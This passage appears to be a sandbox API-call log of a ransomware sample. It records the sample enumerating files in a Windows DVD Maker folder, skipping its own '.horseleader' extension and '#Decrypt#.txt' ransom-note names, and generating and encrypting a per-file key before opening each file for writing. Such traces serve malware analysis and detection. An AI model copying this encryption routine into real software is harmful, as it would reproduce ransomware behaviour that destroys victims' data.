pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\..") returned 55 [0251.688] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.688] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.688] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72003fbd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72003fbd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39eaa, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 [0251.688] lstrcmpiW (lpString1="Notes_INTRO_BG.wmv", lpString2="Windows") returned -1 [0251.688] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv") returned 71 [0251.688] StrStrIW (lpFirst="Notes_INTRO_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.688] lstrcmpW (lpString1="Notes_INTRO_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.688] lstrcmpW (lpString1="Notes_INTRO_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.688] lstrlenW (lpString=".testttjffg") returned 11 [0251.688] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.688] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.688] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.689] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72050277, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72050277, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3dd24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_INTRO_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.689] lstrcmpiW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.689] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv") returned 75 [0251.689] StrStrIW (lpFirst="Notes_INTRO_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.689] lstrcmpW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.689] lstrcmpW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.689] lstrlenW (lpString=".testttjffg") returned 11 [0251.689] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.689] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.689] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.690] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720763d4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x720763d4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e5d1ee3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0b4a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_LOOP_BG.wmv", cAlternateFileName="")) returned 1 [0251.690] lstrcmpiW (lpString1="Notes_LOOP_BG.wmv", lpString2="Windows") returned -1 [0251.690] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv") returned 70 [0251.690] StrStrIW (lpFirst="Notes_LOOP_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.690] lstrcmpW (lpString1="Notes_LOOP_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.690] lstrcmpW (lpString1="Notes_LOOP_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.690] lstrlenW (lpString=".testttjffg") returned 11 [0251.690] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.690] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.691] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.691] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7210e948, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7210e948, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e61e19f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd43ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_LOOP_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.691] lstrcmpiW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.691] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 74 [0251.691] StrStrIW (lpFirst="Notes_LOOP_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.691] lstrcmpW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.691] lstrcmpW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.691] lstrlenW (lpString=".testttjffg") returned 11 [0251.691] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.691] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.691] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.691] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7240848c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7240848c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e66a45b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-back-over-select.png", cAlternateFileName="")) returned 1 [0251.692] lstrcmpiW (lpString1="Pets_btn-back-over-select.png", lpString2="Windows") returned -1 [0251.692] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png") returned 82 [0251.692] StrStrIW (lpFirst="Pets_btn-back-over-select.png", lpSrch=".horseleader") returned 0x0 [0251.692] lstrcmpW (lpString1="Pets_btn-back-over-select.png", lpString2="#Decrypt#.txt") returned 1 [0251.692] lstrcmpW (lpString1="Pets_btn-back-over-select.png", lpString2="_uninstalling_.png") returned 1 [0251.692] lstrlenW (lpString=".testttjffg") returned 11 [0251.692] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png", lpSrch=".testttjffg") returned 0x0 [0251.692] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.692] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.693] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7242e5e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7242e5e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e66a45b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x739, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-back-static.png", cAlternateFileName="")) returned 1 [0251.693] lstrcmpiW (lpString1="Pets_btn-back-static.png", lpString2="Windows") returned -1 [0251.693] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png") returned 77 [0251.693] StrStrIW (lpFirst="Pets_btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.693] lstrcmpW (lpString1="Pets_btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.693] lstrcmpW (lpString1="Pets_btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.693] lstrlenW (lpString=".testttjffg") returned 11 [0251.693] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.693] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72454746, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72454746, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-next-over-select.png", cAlternateFileName="")) returned 1 [0251.694] lstrcmpiW (lpString1="Pets_btn-next-over-select.png", lpString2="Windows") returned -1 [0251.694] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png") returned 82 [0251.694] StrStrIW (lpFirst="Pets_btn-next-over-select.png", lpSrch=".horseleader") returned 0x0 [0251.694] lstrcmpW (lpString1="Pets_btn-next-over-select.png", lpString2="#Decrypt#.txt") returned 1 [0251.694] lstrcmpW (lpString1="Pets_btn-next-over-select.png", lpString2="_uninstalling_.png") returned 1 [0251.694] lstrlenW (lpString=".testttjffg") returned 11 [0251.694] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png", lpSrch=".testttjffg") returned 0x0 [0251.694] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.694] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.694] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7247a8a3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7247a8a3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7f9, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-next-static.png", cAlternateFileName="")) returned 1 [0251.694] lstrcmpiW (lpString1="Pets_btn-next-static.png", lpString2="Windows") returned -1 [0251.694] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png") returned 77 [0251.694] StrStrIW (lpFirst="Pets_btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.694] lstrcmpW (lpString1="Pets_btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.694] lstrcmpW (lpString1="Pets_btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.694] lstrlenW (lpString=".testttjffg") returned 11 [0251.694] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.695] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.695] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" 
(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.695] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722b1847, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722b1847, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb4b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-over-DOT.png", cAlternateFileName="")) returned 1 [0251.695] lstrcmpiW (lpString1="Pets_btn-over-DOT.png", lpString2="Windows") returned -1 [0251.695] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png") returned 74 [0251.695] StrStrIW (lpFirst="Pets_btn-over-DOT.png", lpSrch=".horseleader") returned 0x0 [0251.695] lstrcmpW (lpString1="Pets_btn-over-DOT.png", lpString2="#Decrypt#.txt") returned 1 [0251.695] lstrcmpW (lpString1="Pets_btn-over-DOT.png", lpString2="_uninstalling_.png") returned 1 [0251.695] lstrlenW (lpString=".testttjffg") returned 11 [0251.695] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png", lpSrch=".testttjffg") returned 0x0 [0251.695] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.695] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.696] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724a0a00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724a0a00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-previous-over-select.png", cAlternateFileName="")) returned 1 [0251.696] lstrcmpiW (lpString1="Pets_btn-previous-over-select.png", lpString2="Windows") returned -1 [0251.696] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png") returned 86 [0251.696] StrStrIW (lpFirst="Pets_btn-previous-over-select.png", lpSrch=".horseleader") returned 0x0 [0251.696] lstrcmpW (lpString1="Pets_btn-previous-over-select.png", lpString2="#Decrypt#.txt") returned 1 [0251.696] lstrcmpW (lpString1="Pets_btn-previous-over-select.png", lpString2="_uninstalling_.png") returned 1 [0251.697] lstrlenW (lpString=".testttjffg") returned 11 [0251.697] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png", lpSrch=".testttjffg") returned 0x0 [0251.697] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.697] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.697] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724a0a00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724a0a00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7e3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.697] lstrcmpiW (lpString1="Pets_btn-previous-static.png", lpString2="Windows") returned -1 [0251.697] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png") returned 81 [0251.697] StrStrIW (lpFirst="Pets_btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.697] lstrcmpW (lpString1="Pets_btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.697] lstrcmpW (lpString1="Pets_btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.697] lstrlenW (lpString=".testttjffg") returned 11 [0251.697] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.697] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.697] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.698] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722d79a4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722d79a4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x33b7, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-border.png", cAlternateFileName="")) returned 1 [0251.698] lstrcmpiW (lpString1="Pets_frame-border.png", lpString2="Windows") returned -1 [0251.698] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png") returned 74 [0251.698] StrStrIW (lpFirst="Pets_frame-border.png", lpSrch=".horseleader") returned 0x0 [0251.698] lstrcmpW (lpString1="Pets_frame-border.png", lpString2="#Decrypt#.txt") returned 1 [0251.698] lstrcmpW (lpString1="Pets_frame-border.png", lpString2="_uninstalling_.png") returned 1 [0251.698] lstrlenW (lpString=".testttjffg") returned 11 [0251.698] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png", lpSrch=".testttjffg") returned 0x0 [0251.698] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.698] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
